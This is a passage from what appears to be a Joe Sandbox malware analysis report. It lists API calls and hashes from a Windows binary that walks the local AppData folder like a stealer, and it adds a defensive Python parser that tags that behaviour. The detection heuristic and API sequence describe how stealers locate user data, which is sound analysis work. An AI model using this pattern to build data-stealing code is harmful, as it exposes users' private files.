                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: baa5a0aee39f21ddfa2ba0cd01e5deb19124f552c3d47ab8ee5bf2b77ba1d9be
                                  • Instruction ID: 33802bce4cf80afeb8a4965fa0670bc33f9972ff4992ba77c4b6a0adab56abcf
                                  • Opcode Fuzzy Hash: baa5a0aee39f21ddfa2ba0cd01e5deb19124f552c3d47ab8ee5bf2b77ba1d9be
                                  • Instruction Fuzzy Hash: F0314B71901218ABDB28EF94DD55FEEB7B8EF84700F5491A9F10EB2190DB306A44CFA1
                                  APIs
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EDFE13
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EDFE2C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Value___vcrt_
                                  • String ID:
                                  • API String ID: 1426506684-0
                                  • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                  • Instruction ID: 87a61dea9a7ad21939880b88087d6b6d025af049091cf228f955d7e9ffe26c8e
                                  • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                  • Instruction Fuzzy Hash: 9A01D8325097A5EDF63456756CC596737D4EB017B9730533BF917A02F2EFA14C829140
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E80DE8,00000000,?), ref: 00E77B40
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E77B47
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00E80DE8,00000000,?), ref: 00E77B54
                                  • wsprintfA.USER32 ref: 00E77B83
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: b651f39468158c59384fb72435ecfd2b3864d71d091fe7c4b7cda66c0c2cfd16
                                  • Instruction ID: fc14f6a2c23e3c1cbb4c042b04af5f1c0f803526b5b511d8f0afd11cc4462367
                                  • Opcode Fuzzy Hash: b651f39468158c59384fb72435ecfd2b3864d71d091fe7c4b7cda66c0c2cfd16
                                  • Instruction Fuzzy Hash: DF112AB2904219ABCB14DBC9DD45BBEB7F8EB4CB11F10411AF655A2284D2795940C7B0
                                  APIs
                                  • __getptd.LIBCMT ref: 00E7CA7E
                                    • Part of subcall function 00E7C2A0: __amsg_exit.LIBCMT ref: 00E7C2B0
                                  • __getptd.LIBCMT ref: 00E7CA95
                                  • __amsg_exit.LIBCMT ref: 00E7CAA3
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00E7CAC7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 92fddb1665e781f57fe6b5c1e1db68a5ed2a2451c2e8f85fc94b30e9b493eadf
                                  • Instruction ID: de6d4c85b3a42b3bab25a5f26b0a8b69e9d41bc3f6dd5d7126f12701629bcff2
                                  • Opcode Fuzzy Hash: 92fddb1665e781f57fe6b5c1e1db68a5ed2a2451c2e8f85fc94b30e9b493eadf
                                  • Instruction Fuzzy Hash: 9CF090329447199BD620FBB89803B4E33E4AF40726F30F14EF50EB61E3DB6459808B96
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Catch
                                  • String ID: MOC$RCC
                                  • API String ID: 78271584-2084237596
                                  • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                  • Instruction ID: f9eeb58a00e83be7808c3699be7b1cec270a970a05c4f16b421ea27b82ebd18a
                                  • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                  • Instruction Fuzzy Hash: 2741887190024DEFCF25CF99DC81AAEBBB5EF48308F189099F90476215D3759A91CF50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: T8
                                  • API String ID: 0-1243456643
                                  • Opcode ID: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                  • Instruction ID: a7dfbed08c0fdb8dc4a873b9969741706f30b10b3370146af2adf793a9f4a441
                                  • Opcode Fuzzy Hash: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                  • Instruction Fuzzy Hash: FA2192F160029DBFDB10AF73CC8886B77EDAF04368714551AFA15A7550D731EE408790
                                  APIs
                                    • Part of subcall function 00E78F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E78F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E751CA
                                  • lstrcat.KERNEL32(?,00E81058), ref: 00E751E7
                                  • lstrcat.KERNEL32(?,01738A38), ref: 00E751FB
                                  • lstrcat.KERNEL32(?,00E8105C), ref: 00E7520D
                                    • Part of subcall function 00E74B60: wsprintfA.USER32 ref: 00E74B7C
                                    • Part of subcall function 00E74B60: FindFirstFileA.KERNEL32(?,?), ref: 00E74B93
                                    • Part of subcall function 00E74B60: StrCmpCA.SHLWAPI(?,00E80FC4), ref: 00E74BC1
                                    • Part of subcall function 00E74B60: StrCmpCA.SHLWAPI(?,00E80FC8), ref: 00E74BD7
                                    • Part of subcall function 00E74B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00E74DCD
                                    • Part of subcall function 00E74B60: FindClose.KERNEL32(000000FF), ref: 00E74DE2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: 2eb597b23b01e237048ddf7ecd998b026cdea838b1374b12643589d51cc8fcd2
                                  • Instruction ID: d514c16bccaeb29a402225e3871760cc589470bf3d6e960f91899084c3e2599e
                                  • Opcode Fuzzy Hash: 2eb597b23b01e237048ddf7ecd998b026cdea838b1374b12643589d51cc8fcd2
                                  • Instruction Fuzzy Hash: 6C21CDB6540208A7C768F770EC56EED737C9754300F4045A4B55EA61C9DE705BCCCB91
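The API list of the second function above (call sites 00E751CA to 00E7520D) shows the folder-resolve, build-path, walk-directory pattern typical of a stealer: the subcall at 00E78F70 invokes SHGetFolderPathA with nFolder 0000001C, which is CSIDL_LOCAL_APPDATA, the returned path is extended with four lstrcat calls and a wsprintfA, and the subcall at 00E74B60 then iterates the directory with FindFirstFileA, FindNextFileA and FindClose, comparing each entry twice with StrCmpCA (the usual place for skipping "." and "..", although the report does not show the strings at 00E80FC4 and 00E80FC8). The script below is an added example and is not part of the Joe Sandbox report: it parses such API lines into records and tags the behaviour. The line grammar is inferred from the lines on this page; the record fields, the CSIDL subset and the tagging heuristic are this example's own assumptions, and the sample input is a constructed copy of the lines above.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Added example, not part of the Joe Sandbox report. The line grammar is inferred
# from the "APIs" lines shown on this page; the record fields, the CSIDL subset
# and the tagging heuristic are this example's own assumptions.

LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# CSIDL constants from ShlObj.h (low byte only; the high bits are flags such as
# CSIDL_FLAG_CREATE = 0x8000). Only folders that matter for user-data theft.
CSIDL_NAMES = {
    0x05: "CSIDL_PERSONAL",
    0x07: "CSIDL_STARTUP",
    0x10: "CSIDL_DESKTOPDIRECTORY",
    0x1A: "CSIDL_APPDATA",
    0x1C: "CSIDL_LOCAL_APPDATA",
    0x23: "CSIDL_COMMON_APPDATA",
    0x26: "CSIDL_PROGRAM_FILES",
    0x28: "CSIDL_PROFILE",
}
USER_PROFILE_CSIDLS = {0x05, 0x07, 0x10, 0x1A, 0x1C, 0x28}

# Constructed sample input: the API lines of the second function above, copied verbatim.
SAMPLE_LINES = """\
• Part of subcall function 00E78F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E78F9B
• lstrcat.KERNEL32(?,00000000), ref: 00E751CA
• lstrcat.KERNEL32(?,00E81058), ref: 00E751E7
• lstrcat.KERNEL32(?,01738A38), ref: 00E751FB
• lstrcat.KERNEL32(?,00E8105C), ref: 00E7520D
• Part of subcall function 00E74B60: wsprintfA.USER32 ref: 00E74B7C
• Part of subcall function 00E74B60: FindFirstFileA.KERNEL32(?,?), ref: 00E74B93
• Part of subcall function 00E74B60: StrCmpCA.SHLWAPI(?,00E80FC4), ref: 00E74BC1
• Part of subcall function 00E74B60: StrCmpCA.SHLWAPI(?,00E80FC8), ref: 00E74BD7
• Part of subcall function 00E74B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00E74DCD
• Part of subcall function 00E74B60: FindClose.KERNEL32(000000FF), ref: 00E74DE2
"""


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple            # raw argument tokens; "?" = not recovered by the sandbox
    ref: int               # call-site address
    parent: Optional[int]  # subcall function the call was attributed to, if any


def parse_api_lines(text: str) -> list:
    """Turn the report's API lines into ApiCall records; reject anything unparseable."""
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = tuple(m.group("args").split(",")) if m.group("args") is not None else ()
        parent = int(m.group("parent"), 16) if m.group("parent") else None
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), parent))
    return calls


def csidl_value(token: str) -> Optional[int]:
    """Low byte of SHGetFolderPath's nFolder argument, or None for an unresolved '?'."""
    try:
        return int(token, 16) & 0xFF
    except ValueError:
        return None


def tag_behaviour(calls: list) -> dict:
    """Heuristic tags for the folder-resolve / build-path / walk-directory pattern."""
    names = [c.api for c in calls]
    tags, roots = set(), []
    for c in calls:
        if c.api.startswith("SHGetFolderPath") and len(c.args) > 1:
            v = csidl_value(c.args[1])
            roots.append("unresolved" if v is None else CSIDL_NAMES.get(v, f"CSIDL_0x{v:02X}"))
            if v in USER_PROFILE_CSIDLS:
                tags.add("user-profile-root")
    if any(n.startswith(("lstrcat", "wsprintf")) for n in names):
        tags.add("path-construction")
    if any(n.startswith("FindFirstFile") for n in names) and \
       any(n.startswith("FindNextFile") for n in names):
        tags.add("directory-walk")
    if {"directory-walk", "user-profile-root"} <= tags:
        tags.add("enumerates-user-data")
    return {"roots": roots, "tags": sorted(tags), "api_counts": dict(Counter(names))}


if __name__ == "__main__":
    print(tag_behaviour(parse_api_lines(SAMPLE_LINES)))
```

Run against the lines above it resolves the root to CSIDL_LOCAL_APPDATA and emits the tags directory-walk, path-construction, user-profile-root and enumerates-user-data. The parser deliberately raises on any line it does not understand rather than skipping it, so a change in the report layout is noticed instead of silently dropping calls from the behaviour summary; arguments the sandbox could not recover ("?") are kept as tokens and mapped to an unresolved root instead of being guessed.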